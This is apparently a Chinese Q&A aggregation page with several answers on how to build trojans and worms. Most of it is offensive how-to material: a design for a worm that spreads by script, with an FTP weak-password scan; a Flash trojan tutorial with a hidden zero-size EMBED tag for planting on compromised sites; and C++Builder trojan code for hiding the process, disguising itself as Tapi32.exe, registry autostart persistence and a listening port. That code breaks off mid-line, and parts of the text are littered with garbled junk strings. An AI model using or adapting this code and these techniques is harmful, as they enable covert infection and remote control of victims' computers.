❶ 木馬的編譯程序是怎麼樣實現的
通過設計一段精巧的代碼實現。一般用匯編或C語言,DELPHI,VBS腳本較為常見。
至於實現的方法,每種病毒都不一樣,都經過特別構思。
❷ 木馬怎麼編輯
一個典型的蠕蟲病毒有兩個功能型部件:傳播和破壞,流行的蠕蟲病毒大都是利用操作系統或者應用程序的漏洞(以弱口令和溢出最為常見),但常常並不會對宿主機造成「致命」的破壞。這兩個特點使蠕蟲病毒比普通電腦病毒傳播得更快,影響力更大。一般來說,單一的蠕蟲病毒只針對某種特定的漏洞進行攻擊,所以一旦這種漏洞得到大范圍修補,病毒也就沒有了生存空間。
更新這種設計,我把傳播部件拆分開來:把掃描、攻擊和破壞腳本化,主程序則負責解析這些腳本。例如針對ftp弱口令進行掃描,我們可以定義如下腳本:
code:
uid = iscript-0a21-2331-x #隨機唯一編號
using tcp;
port 21;
send 「user anonymous」;
send crlf;
send 「pass [email protected]」
send crlf;
if (find 「200」) resulrt ok;
next;
[ to clipboard]
解析了這段腳本後(我想這種腳本是很容易讀懂的),我們再定義一系列的過程,把我們的蠕蟲體upload上去,一次完整的傳播動作就完成了。如果是溢出漏洞,為了簡單起見我們可以採集遠程溢出的數據包,然後修改ip地址等必要數據,再轉發溢出數據包進行溢出(這種情況下要實現connect-back就不容易了,不過這些具體問題就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send 「\x1a\xb2\xcc」 ……
[ to clipboard]d
主程序在完成傳播後留下一個後門,其他宿主機可以通過這個後門與本地的蠕蟲病毒同步傳播腳本,這樣每次有新的漏洞產生,宿主機的傳播方式可以很快地得到升級。我們當然不會僅滿足於這樣一個蠕蟲程序,掃描/攻擊腳本的傳播過程也是需要仔細處理的。
我們希望適應力(fitness)最強的腳本得到廣泛的應用(看起來有點類似 蟻群演算法和 ga),所以我們要求得每個個體的fitness,當它和另一個體取得聯系的時候就可以決定誰的傳播腳本將取代另一個:
fitness = number of host infected / number of host scanned
但也不能僅憑fitness就修改傳播腳本,我個人覺得一個合適的概率是75%,20%的機會保持各自的傳播腳本,剩下的5%則交換腳本。這樣在維持每種腳本都有一定生存空間的情況下使適應性最好的個體得到更多的傳播機會,同時,一些在某種網路環境下適應性不強的腳本也有機會嘗試不同的網路環境
❸ 急需知道,病毒,木馬那些源代碼通過什麼方式轉換為可以運行的程序編譯嗎用什麼軟體
其實就是在網站源代碼里的文件最後面寫了一個語言。這個語言指向了有病毒的網站或是伺服器。你一打開網站。同時也就同時指向那網站。那個網站是存病毒的根。
❹ 怎麼編寫木馬
這個只是惡作劇程序,不是木馬。
其實很簡單嘛,只要終止explorer.exe進程就行了。
這都不需要編程,只要寫個批處理就行。
把:taskkill
/f
/im
Explorer.exe寫到一個文本文檔里,然後把那個文檔的後綴名由.txt改為.bat就行了。
❺ 木馬是如何編寫的
這個木馬只是個例子在模枋BO,
很簡單是灰鴿子類的遠程式控制制軟體! 編寫思路上一段就是隱藏自己,當有客戶端連接時告訴以方你控制的機器是什麼操作系統!
❻ 木馬的編程是什麼
一、製作Flash動畫木馬的准備 _1@2{3|$^'M!A程序開發,操作系統,伺服器,源碼下載,linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 Flash動畫木馬的原理,是在網頁中顯示或本地直接播放Flash動畫木馬時,讓Flash自動打開一個網址,而該網址就是我們預先製作好的一個木馬網頁。也就是說,在製作網頁木馬前,我們首先需要製作好一個網頁木馬,並將它放置到某個網站上去。 %H8H7W*B%N,|:^4i+p6U 另外,我們還需要准備一個比較吸引人的Flash動畫文件「MM熱舞.swf」,以及Flash動畫反編譯工具「閃客精靈」,編輯工具Macromedia Flash MX。 二、最原始的Flash木馬 (X8h4s8G8L"G程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇 現在雖然有了許多各種各樣的Flash動畫木馬製作工具,但是為了了解Flash動畫木馬的最基本原理,有必要從頭開始用最原始的方法製作一個Flash木馬。 'h'C(U$R'I1L2v"ttech.techweb.com.cn 步驟一:反編譯SWF動畫-O7c$^,d"h&Q7v5W 首先我們需要將要插入網頁木馬的Flash動畫文件「MM熱舞.swf」,反編譯成可編輯的.fla格式。運行「閃客精靈」,點擊菜單「文件」→「快速打開」命令,指定「MM熱舞.swf」文件將其導入。然後點擊工具欄上的「導出FLA」命令,將動畫導出為「MM熱舞.fla」文件。 5?-^9_-h)b8F3I,E;m5F 步驟二:插入網頁木馬代碼9t!m*W,{5q%\6j"H!]6n"f 然後運行Flash動畫編輯器Macromedia Flash MX,點擊菜單「文件」→「打開」,調入剛才保存的fla文件。展開界面下方的「動作/幀」欄,再展開「動作」→「瀏覽器/網路」項,點擊其中的「getURL」命令,在右邊窗口中的「URL」裡面輸入我們的網頁木馬地址;窗口方式為「_blank」;「變數」設置為「使用GET方式發送」,在下方的代碼窗口中將出現「getURL("http://網頁木馬地址", "_blank", "GET");」。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W 補充: 步驟三:生成Flash木馬 -V"L$o(t8H6m9l)rtech.techweb.com.cn 設置完畢後保存文件,並點擊菜單「文件」→「發布」命令,將動畫重新導出為SWF格式。用IE瀏覽器打開剛才生成的Flash動畫木馬,可以看到隨著Flash動畫打開播放時,自動彈出一個瀏覽器窗口,裡面將會顯示我們的木馬網頁。 接著~~~~~ 三、簡簡單單生成Flash木馬tech.techweb.com.cn*S0m7p#o5A p7S#C6l2z&f9e 程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇-q"R1h8o8j0Z5c 上面插入木馬的過程比較麻煩,下面我們介紹一個簡單的方法,也正是這些簡單的工具使得Flash木馬在網上隨處可見。 6V5n8`!I0R/c6~,e程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+z%m3L'k&}6M2` 運行SWF木馬插入器,點擊界面中的「選擇」按鈕,瀏覽指定要插入木馬的SWF文件;在「插入代碼」中輸入木馬網頁的地址;切記不要勾選下面的「只解壓」項。設置完畢後,點擊「給我插」按鈕,程序提示開始插入木馬網頁。顯示成功信息後,關閉程序,用IE打開生成的動畫,可以看到自動跳轉到木馬網頁去了。 2v)l8e"^5H9^&[#_!l 9{7l#Z+X"J(P @,B 四、Flash木馬的利用 9U+p6W;d;D7e+F9Ktech.techweb.com.cn 4W6Z4W1v4V"}4A/D$t._0_7P1o 看到上面的步驟了吧,生成一個Flash動畫木馬是不是很簡單? 那麼生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中,就可以通過論壇或網站之類的直接利用了。 補充: #B&c)e#c9A%`-w程序開發,操作系統,伺服器,源碼下載,Linux,Unix,BSD,PHP,Apach,asp,下載,源碼,黑客,安全,技術社區,技術論壇+|,K({&L#P2n:\6^ 大部分的論壇中都可以發來Flash動畫的帖子,利用論壇發帖,攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例,在發帖或回復時,點擊編輯窗口上方的「插入Flash動畫」按鈕,設置Flash窗口大小,使用默認設置後,要求輸入Flash的URL地址。確定後,可以看到編輯窗口中顯示的代碼為「「(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)」」,這就是完整的Flash播放代碼了,不同的論壇代碼是不一樣的。TechWeb-技術社區5h4n8X5]/@'G+`'R'i %`6W'e)~"h 應用二:網頁嵌入Flash木馬"U3S9Z3v ^ 1q8X!h-V+V0T 攻擊者入侵了某個大的網站之後,很可能在網站首頁掛馬,使用普通方式掛馬會被管理員發覺,但是掛上Flash木馬的話,是很難查殺的。攻擊者可能在網頁中插入如下代碼:8y1o*@6L&l5k8L i8a9u%A,h5@/w 「《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》」,其中的《》改為<>。 $B;{)o,j5C,A.H;Z(sTechWeb-技術社區5L/b)o'K,m:s'i1t 這里的參數「width=0 height=0」表示,Flash播放窗口為零,也就是不顯示Flash播放窗口。其它用戶瀏覽網頁時,就會莫名其妙的彈出一個木馬網頁窗口。 '^9e#G)n:X-j*T 1f6F#k.z&j3G
滿意請採納
❼ 木馬一般是什麼程序寫出來的
如何識別木馬
識別木馬有新招,希望這篇文章對你有所幫助。
一、經常看到有玩家說,在輸入自己的帳號的時候通故意輸錯帳號和碼。其實這種木馬是最早期的木馬程序。現在已經很少有編木馬程序的程序員,還按照這種監聽鍵盤記錄的思路去編寫木馬程序。現在的木馬程序已經發展到通過內存提取數據來獲得用戶的帳號和密碼。大家都知道,不管是傳奇還是任何一款程序。它都是有他所特有的數據的(包括玩家的帳號、密碼,等級裝備資料等等)。這些數據都是會通過本機與游戲伺服器取得了驗證以後,玩家的角色資料才會出現在玩家的面前。而這些數據在運行的時候都是存放在計算機的內存裡面的。木馬作者只需要在自己的程序裡面加入條件語句就可以取得玩家真實的游戲帳號、密碼、角色等級~~~~~,以我自己的計算機知識,這種語句的大概意思應該是:當游戲進程進入到讓玩家選擇角色的時候再從內存中提取最後一次的帳號、密碼、角色等級等資料。也就是說,其實玩家之前所做的故意輸錯帳號或密碼完全是浪費自己的表情、浪費自己的時間。
下邊先來說一下木馬是如何通過網頁進入你的電腦的,相信大家都知道,現在有很多圖片木馬,EML和EXE木馬,其中的圖片木馬其實很簡單,就是把木馬exe文件的文件頭換成bmp文件的文件頭,然後欺騙IE瀏覽器自動打開該文件,然後利用網頁里的一段javaSCRIPT小程序調用DEBUG把臨時文件里的bmp文件還原成木馬exe文件並拷貝到啟動項里,接下來的事情很簡單,你下次啟動電腦的時候就是你噩夢的開始了,EML木馬更是傳播方便,把木馬文件偽裝成audio/x-wav聲音文件,這樣你接收到這封郵件的時候只要瀏覽一下,不需要你點任何連接,windows就會為你代勞自動播放這個他認為是wav的音樂文件,木馬就這樣輕松的進入你的電腦,這種木馬還可以frame到網頁里,只要打開網頁,木馬就會自動運行,另外還有一種方法,就是把木馬exe編譯到.JS文件里,然後在網頁里調用,同樣也可以無聲無息的入侵你的電腦,這只是些簡單的辦法,還有遠程式控制制和共享等等漏洞可以鑽,知道這些,相信你已經對網頁木馬已經有了大概了解,
簡單防治的方法:
開始-設置-控制面版-添加刪除程序-windows安裝程序-把附件里的windows scripting host去掉,然後打開Internet Explorer瀏覽器,點工具-Internet選項-安全-自定義級別,把裡面的腳本的3個選項全部禁用,然後把「在中載入程序和文件」禁用,當然這只是簡單的防治方法,不過可能影響一些網頁的動態java效果,不過為了安全就犧牲一點啦,這樣還可以預防一些惡意的網頁炸彈和病毒,如果條件允許的話可以加裝防火牆,再到微軟的網站打些補丁,反正我所知道的網吧用的都是原始安裝的windows,很不安全哦,還有盡量少在一些小網站下載一些程序,尤其是一些號稱黑客工具的軟體,小心盜不著別人自己先被盜了,當然,如果你執意要用的話,號被盜了也應該付出這個代價吧。還有,不要以為裝了還原精靈就很安全,據我所知,一般網吧的還原精靈都只還原c:%
❽ 簡單的木馬怎麼編寫啊
特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷, 使在Dos——Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。
我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙——先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
//載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
//卸載動態鏈接庫
}
}
這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。
接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改注冊表,以便啟動時自動載入:
{
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
//格式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
//將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE);
//打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
{
//如果以下語句發生異常,跳至catch,以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
//查找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
//如果不是,就寫入以上鍵值和內容
}
catch(...)
{
//如果有錯誤,什麼也不做
}
}
好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。
接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s%2
❾ 編寫木馬程序能用到的軟體有哪些
你是想要能夠生成木馬的 木馬生成器 還是要編寫木馬的編譯器? 能夠生成木馬的生成器有很多! 國內出名的有 黑洞,灰鴿子, 上興, PCshare,DRAT2009...等等N多. 關於能編寫木馬的軟體有太多了.基本是種編譯器就可以滿足這樣的條件,關鍵是要看你會用哪門語言!C ?C++? JAVA? DELPHI? 還是E語言?N多種語言.. 編譯器 你可以選擇Microsoft Visual Studio .NET 2003 這是比較優秀的了再就是tuboC++ .或者 linux系統自帶的編譯器都可以